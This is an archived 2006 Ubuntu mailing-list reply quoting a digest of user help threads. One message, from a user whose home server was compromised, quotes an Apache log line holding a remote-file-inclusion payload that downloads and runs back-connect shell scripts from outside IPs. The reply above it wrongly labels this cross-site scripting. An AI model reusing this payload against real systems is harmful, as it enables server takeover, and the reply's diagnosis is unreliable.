Re: My home desktop was compromised, but how?
- From: Scott <sdamron@xxxxxxxxx>
- Date: Tue, 28 Feb 2006 15:50:40 -0600
It is a cross site scripting thing. Someone is bouncing off of you in
order to gain access to someone else, unless your IP Address is the
start or finish one, then you have been owned. However, you may have
PHP installed on your system, but not using it, and it needs updated!!
On 2/28/06, ubuntu-users-request@xxxxxxxxxxxxxxxx
<ubuntu-users-request@xxxxxxxxxxxxxxxx> wrote:
Send ubuntu-users mailing list submissions to
ubuntu-users@xxxxxxxxxxxxxxxx
To subscribe or unsubscribe via the World Wide Web, visit
https://lists.ubuntu.com/mailman/listinfo/ubuntu-users
or, via email, send a message with subject or body 'help' to
ubuntu-users-request@xxxxxxxxxxxxxxxx
You can reach the person managing the list at
ubuntu-users-owner@xxxxxxxxxxxxxxxx
When replying, please edit your Subject line so it is more specific
than "Re: Contents of ubuntu-users digest..."
Today's Topics:
1. Re: can't open hda1 icon on desktop (alex)
2. Re: Routing Problem (?? Wei-Yee Chan)
3. Re: can't open hda1 icon on desktop (Max Andersen)
4. Re: can't open hda1 icon on desktop (Lo?c Martin)
5. My home desktop was compromised, but how? (Carthik Sharma)
6. Re: [Dapper] How to get mounted disk show on the desktop
(Guido Heumann)
7. Re: XFCE4 Install under Dapper (paul cooke)
8. gcj compile issues (Roy Britten)
----------------------------------------------------------------------
Message: 1
Date: Tue, 28 Feb 2006 14:31:27 -0500
From: alex <radsky@xxxxxxxx>
Subject: Re: can't open hda1 icon on desktop
To: Ubuntu Help and User Discussions <ubuntu-users@xxxxxxxxxxxxxxxx>
Message-ID: <4404A50F.5070509@xxxxxxxx>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
alex wrote:
I downloaded a NTFS file with ubuntu and it is currently in /home.Problem solved....... Too much of a hastle doing it in ubuntu so I
I'd like to put in the Windows XP in hda1.
There's a hda1 icon on the ubuntu desktop but its permissions are
currently 400 and greyed out so
I can't write to it. I tried chmod 660 but it has no effect.
How can I get that NTFS file into hda1 without doing it in Windows?
alex
downloaded it with Windows XP
I was hoping to do all my internet work with ubuntu but apparently there
are still some limitations. .
Thanks for the responses.
alex
------------------------------
Message: 2
Date: Wed, 01 Mar 2006 03:32:22 +0800
From: ?? Wei-Yee Chan <survivor@xxxxxxxxxxx>
Subject: Re: Routing Problem
To: Ubuntu Help and User Discussions <ubuntu-users@xxxxxxxxxxxxxxxx>
Message-ID: <4404A546.7040405@xxxxxxxxxxx>
Content-Type: text/plain; charset=UTF-8
Have U tried asking Fred? He's using Suse, so he might know.
DC Parris wrote:
Greetings,
My primary box, running SUSE Linux 10.0 is doubling as my router. I can get
my laptop running SUSE 10.0 to connect to the Internet through this primary
box. However, I have not been able to successfully connect to the Internet
from an Ubuntu 5.10 box on my LAN. Running a single distro environment is
not feasible for my situation, but at least there are no Windows boxes.
Anyway, here's my basic info.
The primary box has two NICs, one connects to Roadrunner via DHCP, and the
internal NIC provides DHCP service to the internal LAN. The Ubuntu box is
getting it's IP address from the SUSE box just fine. It even lists the SUSE
box as its name server. Yet, it doesn't see the external NIC.
When I ping the external NIC, I get a "network unreachable" message. When I
first installed Ubuntu, I had no need to share the connection, and did not
configure a default route. I believe that is where the problem lies, but am
not sure what to do about it. Any help is greatly appreciated.
Regards,
Don
------------------------------
Message: 3
Date: Tue, 28 Feb 2006 20:39:56 +0100
From: Max Andersen <max@xxxxxxxxxxx>
Subject: Re: can't open hda1 icon on desktop
To: Ubuntu Help and User Discussions <ubuntu-users@xxxxxxxxxxxxxxxx>
Message-ID: <4404A70C.7000608@xxxxxxxxxxx>
Content-Type: text/plain; charset="iso-8859-1"
alex wrote:
alex wrote:
I downloaded a NTFS file with ubuntu and it is currently in /home.Problem solved....... Too much of a hastle doing it in ubuntu so I
I'd like to put in the Windows XP in hda1.
There's a hda1 icon on the ubuntu desktop but its permissions are
currently 400 and greyed out so
I can't write to it. I tried chmod 660 but it has no effect.
How can I get that NTFS file into hda1 without doing it in Windows?
alex
downloaded it with Windows XP
I was hoping to do all my internet work with ubuntu but apparently
there are still some limitations. .
The limitation is your ntfs..... and a file is not ntfs. the filesystem
is ntfs. Big difference. But if this simple problem scared you of, it's
a wise choice leaving ubuntu. Because larger problems than that arise
when using open source against closed source.
Sincerely
Max
-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 3414 bytes
Desc: S/MIME Cryptographic Signature
Url : https://lists.ubuntu.com/archives/ubuntu-users/attachments/20060228/ee4b394e/smime-0001.bin
------------------------------
Message: 4
Date: Tue, 28 Feb 2006 20:54:57 +0100
From: Lo?c Martin <lomartin3@xxxxxxxxx>
Subject: Re: can't open hda1 icon on desktop
To: Ubuntu Help and User Discussions <ubuntu-users@xxxxxxxxxxxxxxxx>
Message-ID: <4404AA91.8080002@xxxxxxxxx>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Max Andersen a écrit :
alex wrote:
Problem solved....... Too much of a hastle doing it in ubuntu so I
downloaded it with Windows XP
I was hoping to do all my internet work with ubuntu but apparently
there are still some limitations. .
The limitation is your ntfs..... and a file is not ntfs. the
filesystem is ntfs. Big difference. But if this simple problem scared
you of, it's a wise choice leaving ubuntu. Because larger problems
than that arise when using open source against closed source.
Sincerely
Max
That's neither really nice nor true. The fact Alex prefers to use XP
*atm* for *this task* doesn't make it any wiser to leave Ubuntu. In
fact, he never stated he was going to do it. Keeping XP for a while just
for the few tasks he still doesn't know how to do on Linux while
*keeping* Ubuntu for all the tasks that are unwise to do on XP
(especially for beginners) seems the wisest choice.
Cheers,
------------------------------
Message: 5
Date: Tue, 28 Feb 2006 15:44:21 -0500
From: "Carthik Sharma" <carthik@xxxxxxxxx>
Subject: My home desktop was compromised, but how?
To: "Ubuntu Help and User Discussions" <ubuntu-users@xxxxxxxxxxxxxxxx>
Message-ID:
<80f75db0602281244t9cd3e22m8759ad81a2b9d967@xxxxxxxxxxxxxx>
Content-Type: text/plain; charset=UTF-8
Hi,
I run an apache, ssh server from my home computer. I have not
installed any php scripts whatsoever. All there are are text files,
and the odd html file.
Somebody seems to have hacked into my desktop/server. I find files in
the /tmp/ (like "agent.8213)directory which I cannot open, these are
setuid-ed -- how do I open these?
In my apache access logs, there are things like
"http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|"
That above is a valid url, and will take you to a script to deface
someone's php script etc, I suppose. Now, how did this malicious
hacker get in my computer?
(The full line is :
192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|
HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)" )
How would I go about tracing how this incident happened?
Any server/security admins here that can help me with a little
patience? I really want to get to the root of this and find out why
whatever happened happened.
None of the passwords for the ssh accounts are dictionary words, in
fact all are combinations of letters, numbers and sometimes special
symbols.
I have done nothing special to modify apache, or the ssh daemon, in
fact, sshd listens on port 8888.
I could paste logs here, but they would be too long. For now, I have
stopped the apache and ssh servers.
Any help will be most welcome. My security bubble just burst :(
Carthik.
------------------------------
Message: 6
Date: Tue, 28 Feb 2006 22:03:47 +0100
From: Guido Heumann <listguido@xxxxxx>
Subject: Re: [Dapper] How to get mounted disk show on the desktop
To: Ubuntu Help and User Discussions <ubuntu-users@xxxxxxxxxxxxxxxx>
Message-ID: <200602282203.48044.listguido@xxxxxx>
Content-Type: text/plain; charset="utf-8"
Am Montag, 27. Februar 2006 19:20 schrieb Vincent Trouilliez:
[...]
In my experience, it won't take effect immediately though,
even restarting Nautilus wasn't enough, even logging out wasn't enough,
I had to reboot the machine, somehow.
Hi Vince,
a little hint for future experiments with GNOME configuration settings:
there's at least one more thing you can do before rebooting, if logging out
doesn't help: restarting GDM. From the login screen, switch to the console
with ctrl-alt-F1 and then sudo /etc/init.d/gdm restart.
Just in case you didn't know. In my experience this sometimes saves me a
desperate reboot.
Greetings,
Guido
------------------------------
Message: 7
Date: Tue, 28 Feb 2006 21:10:49 +0000
From: paul cooke <paul.cooke100@xxxxxxxxxxxxxxxx>
Subject: Re: XFCE4 Install under Dapper
To: Ubuntu Help and User Discussions <ubuntu-users@xxxxxxxxxxxxxxxx>
Message-ID: <200602282110.49413.paul.cooke100@xxxxxxxxxxxxxxxx>
Content-Type: text/plain; charset="iso-8859-1"
On Monday 27 February 2006 12:40, Jani Monoses wrote:
Actually, XFCE4 is a meta package that will install enough components to
have a XFCE4 desktop, as mentioned though, XFCE4 is not in its prime
right now.
xfce4 is no longer recommended, use xubuntu-desktop instead. Although
for those wishing to use xfce4 without the rest of xubuntu apps I guess
the former metapackage will need to be updated to reflect the current
changes.
what are you on about?
xfce4 as a metapackage is great if you don't want the rest of your ubuntu
being messed up by installing xubuntu-desktop.
For one thing, it doesn't mess up your spashscreen shown while loading.
for another, you don't get the whole shebang of the rest of xfce4 being
installed.
And another, it makes it a heck of a lot easier to upgrade or remove...
I, for one, prefer far smaller meta-packages.
xubuntu-desktop is what you use when you're ONLY having xfce on top of the
core...
Jani
------------------------------
Message: 8
Date: Wed, 1 Mar 2006 10:30:14 +1300
From: "Roy Britten" <roy.britten@xxxxxxxxx>
Subject: gcj compile issues
To: ubuntu-users@xxxxxxxxxxxxxxxx
Message-ID: <ea7284a10602281330v7f8baeb3x@xxxxxxxxxxxxxx>
Content-Type: text/plain; charset="iso-8859-1"
Hi,
I have plans to compile (under Ubuntu) Java programs to native MS Windows
executables. I have installed mingw32, mingw32-binutils and mingw32-runtime
as well as gcj, gcj-4.0, gcj-4.0-base, java-gcj-compat, libgcj6,
libgcj6-awt, libgcj6-common, and libgcj-common. I'm using the sun JVM. I'm
running Ubuntu 5.10.
I can compile a windows binary using the MingW32 gcc, and a Java class file
using gcj. I haven't found a good howto for creating a Windows binary from
Java code under Linux. I suspect that there's some classpath issues or some
such to be sorted. Can someone who has done this before point me to the
solution?
Thanks,
Roy.
$ uname -a
Linux smallgreybox 2.6.12-10-686 #1 Mon Feb 13 12:18:37 UTC 2006 i686
GNU/Linux
$ java -version
java version "1.5.0_06"
Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_06-b05)
Java HotSpot(TM) Client VM (build 1.5.0_06-b05, mixed mode, sharing)
$ i586-mingw32msvc-gcc -o hello.exe hello.c # successfully creates windows
binary from C code
$ gcj -C Hello.java # successfully creates class file from Java code
$ gcj --main=Hello -o Hello.exe Hello.java
gcj: libgcj.spec: No such file or directory
$ gcj -v
Using built-in specs.
Reading specs from libgcj.spec
gcj: libgcj.spec: No such file or directory
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.ubuntu.com/archives/ubuntu-users/attachments/20060301/b8fab60d/attachment.htm
------------------------------
--
ubuntu-users mailing list
ubuntu-users@xxxxxxxxxxxxxxxx
https://lists.ubuntu.com/mailman/listinfo/ubuntu-users
End of ubuntu-users Digest, Vol 18, Issue 294
*********************************************
--
-------------------------------
When all you have is a hammer, everything starts to look like a nail.
Registered Linux User #409723
--
ubuntu-users mailing list
ubuntu-users@xxxxxxxxxxxxxxxx
https://lists.ubuntu.com/mailman/listinfo/ubuntu-users
- Prev by Date: Re: My home desktop was compromised, but how?
- Next by Date: Re: My home desktop was compromised, but how?
- Previous by thread: Re: My home desktop was compromised, but how?
- Next by thread: gcj compile issues
- Index(es):
Relevant Pages
|
